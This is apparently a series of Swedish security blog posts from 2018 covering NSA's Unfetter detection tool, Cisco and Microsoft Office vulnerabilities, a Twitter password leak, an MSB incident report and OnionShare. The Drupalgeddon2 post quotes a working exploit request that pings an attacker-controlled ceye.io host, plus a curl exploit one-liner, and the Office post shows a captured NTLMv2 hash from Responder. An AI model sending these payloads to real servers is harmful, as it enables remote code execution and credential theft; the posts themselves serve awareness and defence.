2018-05-09

Unfetter – NSA:s nya verktyg för att upptäcka avancerade cyberattacker

Den amerikanska myndigheten NSA har tillsammans med det icke vinstdrivande företaget Mitre utvecklat ett nytt verktyg vid namn Unfetter. Med hjälp av detta verktyg så kan en organisation effektivare identifiera cyberattacker genom att fokusera på att upptäcka beteendebaserad metodik istället för indikatorer samt inspireras av Mitres tidigare projekt vid namn CAR och ATT&CK.

Verktyget finns tillgängligt som open-source via Github och jag har givetvis testat verktyget.

Först och främst så klonade jag hem repot som innehåller docker-compose.yml vilket används av Docker. Sedan skrev jag docker-compose up i katalogen för att ladda hem och starta upp sex stycken containers:

Den container som heter unfetter-discover-gateway ser till att exponera tcp port 80 samt 443 och surfar vi sedan in på https://localhost så möts vi (förutom ett certifikatfel) följande bild:

Där jag sedan har möjlighet att navigera vidare till någon av de vyer som finns förinstallerade via Kibana:

Threat Dashboard
Analytic Exchange
Assessments
Assessments 3.0
Intrusion Set Dashboard
Events Dashboard
API Explorer
STIX

Tanken är alltså att du ska skicka in data från olika klienter och servrar med hjälp av NXlog och sysmon exempelvis.

Följande övergripande arkitekturbild visar hur det hänger ihop:

Givetvis så följer det även med exempelkonfigurationer till både nxlog och sysmon.

Men den kanske mest intressanta frågan är: Hur upptäcks avancerade cyberattacker? Det är genom att koppla ihop olika indikatorer, exempelvis denna:

CAR-2016-04-005: Remote Desktop Logon

Vilket implementerar ungefär (pseudokod) följande regler på inkommande analyserade loggar:

[EventCode] == 4624 and
[AuthenticationPackageName] == 'Negotiate' and
[Severity] == "Information" and
[LogonType] == 10

A remote desktop logon, through RDP, may be typical of a system administrator or IT support, but only from select workstations. Monitoring remote desktop logons and comparing to known/approved originating systems can detect lateral movement of an adversary.

Dessa indikatorer kan sedan kopplas mot Mitres ATT&CK och olika grupperingar såsom Equation Group (EQGRP) och deras modus operandi. Dock verkar det inte gå automatiskt i dagsläget och så här ser Intrusion Set Dashboard ut för Equation:

Vi kan även se att Equation har 2 av 219 attack patterns i det intrusion set som följer med Unfetter. För den som vill se hur logstash är konfigurerad mot sysmon kan kolla in följande konfigg-fil på Github.

NSA framhäver även att Unfetter inte är färdigt för att användas i produktion ännu:

This is not designed for production use

2018-05-04

Sårbarhet i Ciscos WebEx-konferenssystem

En ny sårbarhet har identifierats i Ciscos system för uppkopplade konferenser. Buggen har CVE-2018-0264 och är en RCE (fjärrexekvering av kod). Sårbarheten återfinnes i hanteringen av Advanced Recording Format (ARF) och denna kod återfinnes i både klienter och serverdelen i WebEx.

Sårbarheten har fått en CVSS Score på 9.6 vilket är nästan det högsta möjliga och är således en bugg som är lätt att utnyttja, men kräver dock användarinteraktion (någon klickar på en fil troligtvis).

Cisco WebEx Business Suite (WBS31) klienter före version T31.23.4
Cisco WebEx Business Suite (WBS32) klienter före version T32.12
Cisco WebEx Meetings med klienter före version T32.12
Cisco WebEx Meeting Server med versioner före 3.0 Patch 1

Detta är inte den enda buggen som på kort tid drabbat Ciscos WebEx-system, även CVE-2018-0112 som drabbade klienter som har WebEx installerat.

2018-05-04

Twitter läckte lösenord

Twitter gick ut med ett meddelande till samtliga 300+ miljoner användare gällande att lösenord har läckt. Samtliga lösenord på mikrobloggen Twitter är hashade med algoritmen bcrypt, men har nu läckt i ett internt system och därför uppmanas alla användare byta sina lösenord. Lösenorden i klartext har enbart varit tillgängliga i en intern loggfil som enbart varit tillgänglig för anställda.

Twitter skriver på sin blogg:

“Due to a bug, passwords were written to an internal log before completing the hashing process,” he continued. “We found this error ourselves, removed the passwords, and are implementing plans to prevent this bug from happening again.”

Följande rekommendationer kommer från Twitter gällande lösenord:

Byt ditt lösenord på Twitter och andra tjänster om du haft samma lösenord
Använd ett starkt lösenord och återanvänd inte detta lösenord på andra tjänster
Använd tvåfaktorsautentisering
Använd en lösenordshanterare som ser till att du använder starka och unika lösenord för alla dina tjänster

Skärmdump på meddelandet som visas till samtliga användare:

2018-04-18

Cisco Smart Install (SMI)

Amerikanska US-CERT gick i förrgår ut med en varning tillsammans med DHS, FBI och brittiska NCSC. Varningen gäller attacker som utförs mot Cisco-enheter som har funktionen Smart Install (SMI) aktiverad.

Enligt varningen så används verktyget Smart Install Exploitation Tool (SIET) som släpptes 2016 och som finns på Github. Även så pekas Ryssland ut som en aktör som står bakom dessa attacker mot amerikansk infrastruktur. Det som också är intressant är att SMI kan bl.a. användas för att ändra operativsystemet i Cisco-enheten, skapa GRE-tunnlar för mitm eller läsa av trafik.

SMI går på tcp port 4786 och så här ser statistik ut för skanningar:

Källa: ISC

Tittar vi på historiken gällande Cisco Smart Install så ser den inte bra ut:

CVE-2018-0171: DoS (device crash) & arbitrary code execution;
CVE-2018-0156: DoS;
CVE-2016-6385: DoS (memory consumption);
CVE-2016-1349: DoS (device reload);
CVE-2013-1146: DoS (device reload);
CVE-2012-0385: DoS (device reload);
CVE-2011-3271: DoS & arbitrary code execution.

Ciscos rekommendation gällande SMI lyder enligt följande:

port 4786 should be exposed to the “integrated branch director” (IBD) router only.

Även så har Ciscos Thalos-grupp släppt ett verktyg för att kontrollera om SMI är öppet som heter smi_check.

Uppdatering 1: Denna presentation från konferensen Zeronights som hålls i Ryssland är intressant. December 2016: https://2016.zeronights.ru/wp-content/uploads/2016/12/CiscoSmartInstall.v3.pdf

Uppdatering 2: Leif Nixon visade på att det finns många enheter på Shodan i Sverige:

En felkonfiguration som utsatts för flera storskaliga attacker de senaste sex månaderna. Hur många av de här enheterna är redan hackade? Är det orealistiskt att förvänta sig att stora organisationer ska ha liiiite bättre koll på sina grejer? pic.twitter.com/dBgtwpMp8q

— Leif Nixon (@leifnixon) 17 april 2018

2018-04-16

Informationsläckage i Microsoft Office

Jag tog en titt på CVE-2018-0950 som är en informationsläckage-bugg i Office. Denna säkerhetsbrist åtgärdades av Microsoft för några veckor sedan och upptäcktes av Will Dormann på CERT-CC.

Buggen går ut på att du kan få Outlook att automatiskt gå ut och ladda in externt innehåll utan att användaren frågas om detta.

Följande bild förevisar detta tydligt:

Genom att skicka ett RTF-mail där ett externt OLE-objekt återfinnes så laddas detta externa OLE-objekt automatiskt in.

Och vet du vad mer detta innebär? Jo, du kan köra Responder.py och få ut NTLMv2-hashen från användaren:

[SMB] NTLMv2-SSP Client   : 192.168.153.136
[SMB] NTLMv2-SSP Username : DESKTOP-V26GAHF\test_user
[SMB] NTLMv2-SSP Hash     : test_user::DESKTOP-V26GAHF:1122334455667788:571EE693342B161C50A73D502EB49B5A:010100000000000046E1992B4BB2D301FFADACA3241B6E090000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000100000000200000D3BDB30B62A8937256327776471E072C7C6DE9F4F98458D1FEA17CBBB6AFBA770A001000000000000000000000000000000000000900280063006900660073002F003100390032002E003100360038002E003100350033002E003100330038000000000000000000

Även om du applicerar patchen som släpptes av Microsoft så kvarstår problemet att du kan skicka UNC-länkar, dvs som börjar med \\.

Därav är det viktigt att blockera utgående SMB (445/tcp, 137/tcp, 139/tcp men även 137/udp och 139/udp) samt läs detta från Microsoft gällande NTLM SSO, ADV170014.

2018-04-13

Drupal RCE nu ute

Den mycket kritiska sårbarhet som jag bloggade tidigare om som åtgärdats i Drupal har nu börjat att utnyttjas på Internet. ISC som först rapporterade om detta såg scanningar där följande mönster dök upp:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: <hostname>
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 162
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=ping <hostname>.mu6fea.ceye.io -c 1

Just denna payload försöker enbart att identifiera sårbara Drupal-installationer genom att köra en enkel ping med argumentet -c 1, dvs count 1. Även om många blockerar utgående trafik så kan DNS släppas ut genom brandväggar. Den subdomän under mu6fea.ceye.io har en wildcard-pekning och kan således unikt identifiera varje DNS-läckage och sårbar installation.

Ser man på whois-data för ceye.io så pekar namnservrarna till:

Name Server: NS1.HACKERNEWS.CC
Name Server: NS2.HACKERNEWS.CC

Vilket är en kinesisk nyhetssajt.

Rekommenderad åtgärd är att uppgradera Drupal till version 7.58 eller 8.5.1

Uppdatering: Denna one-liner kan också användas:

curl -X POST –data
'form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=phpinfo()'
'https://localhost/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'#drupalgeddon2 #Drupal

— Bo0oM (@i_bo0om) April 13, 2018

2018-04-10

Ny rapport: obligatorisk IT-incidentrapportering till MSB för 2017

Igår så släppte Myndigheten för samhällsskydd och beredskap (MSB) en årsrapport gällande den obligatoriska IT-incidentrapporteringen. Denna rapport gäller för de incidenter som rapporterats under helåret 2017. Den förra rapporten som släpptes för 2016 gällde enbart April-December.

Det första jag kan utläsa från rapporten som är på 22 sidor (finns nedan) är att det finns ett stort mörkertal. Knappt en tredjedel av de som är rapporteringsskyldiga har rapporterat in något till MSB, och detta får till följd att det är svårt att ge en samlad bild de av de allvarliga it-incidenter som drabbar myndigheter.

Snittet gällande antalet rapporter per månad ligger på 23,4 i Sverige och jämför man med Estland så ligger de på 187 st per månad, dock kan det skilja åt vad som måste rapporteras mellan länderna.

Den obligatoriska rapporteringen till MSB kommer även att fortsätta även efter det att NIS-direktivet träder i kraft. Vilket gör att vissa myndigheter måste rapportera dubbelt.

Tittar vi på statistiken så har 79 st myndigheter lämnat in rapporter och den siffran var förra året på 77 st. Och MSB själva har några troliga förklaringar till varför siffran gällande rapporter är så pass låg:

Upphandlad extern IT-drift innan ikraftträdandet av rapporteringen. Denna är undantagen
Myndigheter som sätter en hög tröskel gällande vad som är en allvarlig it-incident

Och antalet incidenter inom varje incidenttyp ser ut enligt följande:

Några intressant iakttagelser från rapporteringen är följande:

Två incidenter som rapporterats handlar om att en angripare kommit över personuppgifter
Kryptotrojaner rapporterades enbart in under årets två första månader (2017)
11 st försök till VD/GD-bedrägerier
17 st incidenter kopplade till överbelastningsattacker
Det är svårt att säkerställa ett metodiskt informationssäkerhetsarbete hos externa leverantörer. MSB bedömer dock:

De incidenter som beror på dåligt upphandlade leverantörer antas minskas då Säkerhetspolisens och Försvarsmaktens mandat att ingripa vid upphandlingar som rör skyddsvärda verksamheter stärks den 1 april 2018.

Det finns ett behov att höja kompetensnivån avseende information- och cybersäkerhet för flera yrkeskategorier
Behov av ett systematiskt arbete med informations- och cybersäkerhet

Största delen av de 281 inrapporterade incidenterna har 149 (53 %) lett till hindrad tillgång till information. Och att det är så beror på att de uppmärksammas och noteras, och rapporteras därmed, i högre grad än incidenter där en antagonistisk aktör medvetet ansträngt sig för att inte lämna spår eller ge sig tillkänna tror MSB.

Här kan du ladda hem årsrapporten för it-incidentrapportering som PDF:

Här kan du läsa vad jag skrev om den förra årsrapporten gällande obligatorisk IT-incidentrapportering till MSB:

Ett år av obligatorisk it-incidentrapportering

2018-03-27

Biljetterna till SecurityFest är nu släppta

Biljetterna till säkerhetskonferensen SecurityFest som går av stapeln i Göteborg är nu släppta. Det datum som gäller är 1:a Juni 2018 samt lokalen som är Eriksbergshallen.

Inga talare är ännu utannonserade men däremot finns det möjlighet att gå två stycken kurser dagen innan konferensen. Kurserna är begränsade till 10 personer och de två kurserna är:

IoT Firmware Exploitation and Attack Countermeasures. Lärare Aaron Guzman
Using DNS to your advantage. Lärare Irena Damsky

För konferensbiljett och utbildning en dag hamnar priset på 10000kr. Om du enbart vill gå på konferensen så blir priset 3125kr ink moms. Och för studenter så blir konferenspriset 1000kr.

Jag har själv inte varit på SecurityFest men tittar jag på förgående års talare så har det varit en otroligt bra line-up.

2018-03-24

Allvarlig sårbarhet i Drupal 7 och 8

Drupals säkerhetsteam har gått ut med en förhandsvarning om en allvarlig sårbarhet i Drupal version 7 samt 8. Drupal är ett blogg- och innehållshanteringssystem skrivet i PHP under licensen GNU General Public License.

Den 28:de Mars så släpps en säkerhetsuppdatering till Drupal. Stor risk finns att någon analyserar patchen och detta kan i sin tur leda till fjärrexekvering av kod (RCE) inom några timmar eller dygn efter att säkerhetsuppdateringen släpps.

Säkerhetsuppdateringen kommer att släppas 18:00 – 19:30 UTC den 28:de Mars 2018. Se då till att uppdatera omgående om du använder Drupal.

Även om Drupal inte längre stödjer 8.3.x samt 8.4.x-versioner så kommer just denna säkerhetspatch att stödja dessa versioner. Drupals säkerhetsteam meddelar även att ingen databasuppdatering är nödvändig.

Mer information finnes här: https://www.drupal.org/psa-2018-001

2018-03-23

Dela filer anonymt med OnionShare

Sedan ett år tillbaka innehåller det anonyma operativsystemet Tails en intressant komponent vid namn OnionShare. OnionShare gör att du på ett enkelt sätt kan dela med dig av filer anonymt (stödjer även stora filer).

Hej! Gillar du Kryptera.se? Bidra gärna med en slant varje månad via Patreon >

Förutom Tails så fungerar OnionShare på Mac, Linux samt Windows. Den version som skickas med Tails 3.6.1 är 0.9.2 och ser ut enligt följande:

Väljer man att ladda hem den senaste versionen till macOS som är 1.3 så är gränssnittet förbättrat med bl.a. nedladdningsräknare samt fler inställningar såsom möjligheten att skapa en ”Stealth Onion Service”, dvs en .onion-domän som inte annonseras ut till katalogtjänsterna i Tor-nätverket. Nackdelen med det är dock att förutom den url du använder för att dela en eller flera filer även måste dela en HidServAuth-sträng som ska in i torrc-konfigfilen.

Skärmdump när jag delar en fil via OnionShare v1.3 på macOS:

Och för den som besöker en URL via Tor Browser som delas ut via OnionShare, så ser det ut enligt följande:

OnionShare är utvecklat i programspråket Python av Micah Lee och återfinnes förutom i Tails på följande sajt:

https://onionshare.org/

Bra och tänka på är att när du startar OnionShare så startar även Tor upp i bakgrunden och ansluter till Tor-nätverket (precis som Tor Browser).

Säkerheten

Hur är det med säkerheten då? Jo, först och främst så är det relativt enkelt att göra en fingerprint på den 404-sida som presenteras om man upptäcker en OnionShare-webbserver. Även så sätter servern OnionShare i http-headern.

Men försöker en angripare forcera den sökväg som unikt genereras med två slumpmässiga ord från en ordlista med 7777 st ord så stöter man på problem. För efter 20 försök så stänger nämligen webbservern ner och visar följande meddelande hos den som delar ut filer via OnionShare:

Funktionen build_slug() som slumpar en URL-slug ser ut enligt följande: